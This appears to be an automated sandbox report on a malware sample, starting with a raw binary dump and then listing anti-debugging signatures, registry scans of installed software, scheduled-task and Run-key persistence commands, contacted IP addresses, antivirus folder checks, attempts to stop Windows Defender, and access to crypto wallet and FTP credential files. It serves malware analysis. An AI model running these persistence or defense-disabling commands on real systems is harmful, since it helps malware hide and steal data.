BÇEì{=$‚„†uIj…ÌûÿÿPh6BÿÖh¼6Bhô6Bÿ׍Ì÷ÿÿQjh7BÿÓ3À3ҍMèQf‰Uðf‰Eò‹UðRPPPÿ€ Bƒmìu¥h¬7BÿP BÿØ{„‹Mô_^d‰ [‹å]ÃÌÌÌU‹ìƒì$=$‚„VWuEÜèԍuÜèì‹=8 BS‹]ü3öÿׁþ ü*~ûå~xu Fþ‹|å‹=< B‹ B3ö¤$jÿ×ÿÓÿˆ BþGm  Fþ¤ö|ã‹=l B3ö[jÿׁþ‰%+ Fþ§|ë¡lŒB£$‚„èýÿÿ‹5| B¿ë ¤$‹ÿ=$‚„ujjÿփïué_3À^‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌVQ‹ð‹Ä蕋Æè~jèG‹Æ^ÃÌÌÌjè9ÃÌÌÌÌÌÌÌÌVQ‹ð‹Ä赋Æèžjèg‹Æ^ÃÌÌÌjèYÃÌÌÌÌÌÌÌÌU‹ì€}tƒ~r‹F蹋ÆÇFè{]ÂÌÌÌÌÌÌÌÂÌÌÌÌÌÌÌÌÌÌÌÌÌÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ì€}tƒ~r‹F虋ÆÇFèk]ÂÌÌÌÌÌÌÌÂÌÌÌÌÌÌÌÌÌÌÌÌÌÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQ3ɈMÿ‰Hè‹ÐEÿèEøÿÿ‹å]Ã̃xr‹@ÃÀÃÌÌPèYÃÌÌÌÌÌÌÌÌU‹ìQ3ɉMü‰Hè‹ÐEüèõ÷ÿÿ‹å]ÃÌPèìYÃÌÌÌÌÌÌÌ̃xr‹@ÃÀËÿU‹ì‹EV‹ñÆF …Àucèq‰F‹Hl‰‹Hh‰N‹; VBt‹ ,UB…Hpuè ‰‹F;0TBt‹F‹ ,UB…Hpuè€ ‰F‹Fö@puƒHpÆF ë ‹‰‹@‰F‹Æ^]‹ÿU‹ìƒìSV‹u3Û;óu èÇSSSSSÇèOƒÄƒÈÿéÌW‹} ÿÿÿÿvè›SSSSSÇè#ƒÄëLÿuMìèÿÿÿ‹E샸¬u WVè¬YYëwSSWVj ÿpÿ B…ÀuèLÇ*8]øt‹Eôƒ`pýƒÈÿëT‰]ü‰];ûv7Š:Ãt,Mì¶ÀQPèYY…Àt ÿE9}sF8t ÿEüFÿE9}rÎ9}r‹Çë‹Eü8]øt‹Môƒapý_^[ÉËÿU‹ìjÿu ÿuèëþÿÿƒÄ 
]ÃÌW‹|$ën¤$‹ÿ‹L$W÷ÁtŠƒÁ„Àt=÷Áuï‹ÿ‹ºÿþþ~Ѓðÿ3ƒÁ©tè‹Aü„Àt#„ät©ÿt©ÿtë͍yÿë yþëyýëyü‹L$ ÷ÁtŠƒÁ„ÒtfˆƒÇ÷Áuê뉃Ǻÿþþ~‹Ѓðÿ3‹ƒÁ©tá„Òt4„öt'÷Âÿt÷Âÿtëlj‹D$_Ãf‰‹D$ÆG_Ãf‰‹D$_È‹D$_ËÿU‹ìj jÿuè3ƒÄ ]ËÿU‹ìÿu j jÿuèEƒÄ]ËÿU‹ì]éÜÿÿÿ‹ÿU‹ì]éG‹ÿU‹ìSV‹uW3ÿƒËÿ;÷uènWWWWWÇèöƒÄ ÃëBöF ƒt7VèX V‹Øè VèçPèƒÄ…À}ƒËÿë‹F;Çt PèÞY‰~‰~ ‹Ã_^[]Ãj h ABèT#ƒMäÿ3À‹u3ÿ;÷•À;ÇuèëÇWWWWWèsƒÄƒÈÿë öF @t ‰~ ‹EäèW#ÃVè,"Y‰}üVè*ÿÿÿY‰EäÇEüþÿÿÿèëՋuVèz"YÃ
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00072a00', u'virtual_address': u'0x00001000', u'entropy': 7.999567521714596, u'name': u'', u'virtual_size': u'0x0010a000'} entropy 7.99956752171 description A section with a high entropy has been found
section {u'size_of_data': u'0x00011e00', u'virtual_address': u'0x0010b000', u'entropy': 7.997448118243177, u'name': u'', u'virtual_size': u'0x00027000'} entropy 7.99744811824 description A section with a high entropy has been found
section {u'size_of_data': u'0x00000800', u'virtual_address': u'0x00132000', u'entropy': 7.294019991877545, u'name': u'', u'virtual_size': u'0x00004000'} entropy 7.29401999188 description A section with a high entropy has been found
section {u'size_of_data': u'0x0009da00', u'virtual_address': u'0x00445000', u'entropy': 7.93905470768719, u'name': u'.data', u'virtual_size': u'0x0009e000'} entropy 7.93905470769 description A section with a high entropy has been found
entropy 0.986423419601 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000488
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
base_handle: 0x80000002
key_handle: 0x00000494
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
1 0 0
cmdline schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2776 CREDAT:145409
cmdline chcp 1251
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
host 109.107.182.3
host 117.18.232.200
host 185.172.128.109
host 185.172.128.19
host 185.172.128.53
host 185.172.128.90
host 185.215.113.68
host 193.233.132.62
host 87.251.77.166
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x0064c5d8
service_name: WinDefend
control_code: 1
0 0

ControlService

service_handle: 0x0064c9e8
service_name: wuauserv
control_code: 1
0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 reg_value C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
cmdline schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\n6P8X5rop5bCHCDpw23f.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini
Time & API Arguments Status Return Repeated

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
